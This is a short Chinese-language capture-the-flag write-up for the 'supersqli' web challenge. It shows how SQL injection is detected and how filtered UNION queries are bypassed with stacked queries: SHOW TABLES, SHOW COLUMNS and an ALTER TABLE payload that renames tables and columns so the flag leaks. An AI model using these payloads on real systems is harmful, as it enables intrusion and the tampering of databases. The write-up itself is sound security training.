题目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。
order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。
尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以
1‘;show talbes–+
查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。
1’;show columns from 1919810931114514
–+
1’;show columns from words
–+
接着找到了一些骚姿势,通过将表1919810931114514改为words,flag列名改为id,这样就能除了flag
payload:1’; alter table words rename to words1;alter table 1919810931114514
rename to words;alter table words change flag id varchar(50);#
然后用1’ or ‘1’='1就可以拿到flag
【攻防世界】——WEB高手进阶--supersqli
最新推荐文章于 2024-05-10 21:16:18 发布